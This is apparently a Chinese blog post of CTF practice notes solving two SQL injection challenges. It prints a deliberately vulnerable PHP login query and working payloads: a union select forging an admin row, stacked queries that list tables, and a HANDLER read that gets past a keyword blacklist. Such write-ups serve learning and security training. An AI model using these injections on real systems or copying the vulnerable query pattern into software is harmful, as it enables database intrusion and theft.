BUUCTF刷题笔记(十四)

§ [GXYCTF2019]BabySQli

§ [GYCTF2020]Blacklist

[GXYCTF2019]BabySQli

mysqli_query($con,'SET NAMES UTF8');
$name = $_POST['name'];
$password = $_POST['pw'];
$t_pw = md5($password);
$sql = "select * from user where username = '".$name."'";
// echo $sql;
$result = mysqli_query($con, $sql);


if(preg_match("/\(|\)|\=|or/", $name)){
	die("do not hack me!");
}
else{
	if (!$result) {
		printf("Error: %s\n", mysqli_error($con));
		exit();
	}
	else{
		// echo '<pre>';
		$arr = mysqli_fetch_row($result);
		// print_r($arr);
		if($arr[1] == "admin"){
			if(md5($password) == $arr[2]){
				echo $flag;
			}
			else{
				die("wrong pass!");
			}
		}
		else{
			die("wrong user!");
		}
	}
}

hint MMZFM422K5HDASKDN5TVU3SKOZRFGQRRMMZFM6KJJBSG6WSYJJWESSCWPJNFQSTVLFLTC3CJIQYGOSTZKJ2VSVZRNRFHOPJ5

base32 解码 c2VsZWN0ICogZnJvbSB1c2VyIHdoZXJlIHVzZXJuYW1lID0gJyRuYW1lJw==

base64 解码 select * from user where username = ‘$name’

试出 username 是 admin

fuzz

过滤了 ( ) = or xor order 等关键字

第二列数据为用户名,第三列数据为 MD5 加密的密码

name=’ union select 1,’admin’,’21232f297a57a5a743894a0e4a801fc3’ #&pw=admin

[GYCTF2020]Blacklist

联合注入

-1' or 1=1 order by 3 #

error 1054 : Unknown column ‘3’ in ‘order clause’

-1' union select 1,2 #

return preg_match(“/set|prepare|alter|rename|select|update|delete|drop|insert|where|./i”,$inject);

堆叠注入

-1';show tables #

array(1) {
[0]=>
string(8) “FlagHere”
}

array(1) {
[0]=>
string(5) “words”
}

-1';desc FlagHere #

array(6) {
[0]=>
string(4) “flag”
[1]=>
string(12) “varchar(100)”
[2]=>
string(2) “NO”
[3]=>
string(0) “”
[4]=>
NULL
[5]=>
string(0) “”
}

handler查询

类似 [强网杯 2019]随便注 但过滤了 set prepare alter rename

改用 HANDLER 语句查询

-1';handler FlagHere open;handler FlagHere read first;handler FlagHere close; #

小结

  1. handler handler … read 语句访问当前指定表

BUUCTF刷题笔记(十四)
https://ba2in9a.top/85bfc6b
作者
ba2in9a
发布于
2022年3月10日
更新于
2022年4月23日
许可协议